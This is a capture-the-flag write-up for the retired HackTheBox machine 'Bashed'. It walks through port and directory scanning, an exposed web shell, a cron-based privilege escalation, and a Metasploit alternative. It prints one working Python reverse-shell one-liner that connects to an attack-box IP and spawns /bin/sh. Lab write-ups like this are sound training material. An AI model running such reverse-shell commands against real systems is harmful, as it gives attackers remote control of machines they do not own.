HackTheBox “Bashed” With & Without Metasploit WriteUp

HackTheBox Bashed

Bashed is a retired machine available on the HackTheBox platform, renowned for its ease of completion, which aligns with its official rating. The journey commences with the discovery of a hidden web shell.

Let’s get started!🚀

Recon & Enumeration

Let’s use nmap to scan for open ports and services:

nmap scanning

Upon conducting a port scan, we observe that port 80 is open.

Check the target through a web browser

Bashed machine on port 80

Let us enumerate more using the tool dirsearch to scan for the directories we have on the web server.

Directory scanning using dirsearch

After going through the directories we got, we have /dev which seems to be interesting.

Directory /dev on bashed machine

Inside the directory /dev, we get the script phpbash.php which gives us access to a web shell.

Web shell on bashed

Exploitation W/O Metasploit

Let us get this shell moved to our attack box by setting up a listener on our attack box.

Netcat listener

In the target machine send a reverse shell to the attack machine using the python command below:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.8",4343));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And we get a shell back on out attack box.

Getting a shell on bashed machine

Now we are looking for a way to escalate our privileges on the machine starting with what can we sudo here.

What sudo can be bypassed

We can run as the user scriptmanager, and with more enumeration, we find the below.

Listing machine’s files

We find that everything here is root owned except the directory /scripts which is owned by scriptmanager.

We change to scriptmanager as below.

scriptmanager user

As we can see below, we have full access rights to the /scripts directory.

scripts directory

We can see that we have a python script owned by us, after listing all files one more time, i saw that the last access time for the test.txt file has changed. After checking the python script below, we can assume that there is a cron job running periodically.

test.py script

let us delete the Python script file

Deleting test.py

Then, create the python script file as below to send a shell back to the attack box.

Creating a reverse shell script

Now, we back to our attack box and set up a listener with the same port we put on the shell.py above.

Netcat listener

After waiting for a while, we get a shell running as a root.

Shell as a root

Exploitation W/ Metasploit

We launch Metasploit handler and set it to get the shell from the web shell we already have on the target.

MSF handler

We background the session and use a module to upgrade the shell to meterpreter one.

Searching for a shell to meterpreter module

We set its options and run.

Setting the options for the module

We check the sessions we have.

Sessions

We search for an exploit suggester module.

Exploit suggester

We set its options and run.

Setting the options for the suggester

We get the modules below, which show that the machine seems to be vulnerable to three of them.

Results of the suggester module

Use the first module and set the options and run.

Options for priv esc module

And we get a root shell.

Root shell

Cheers.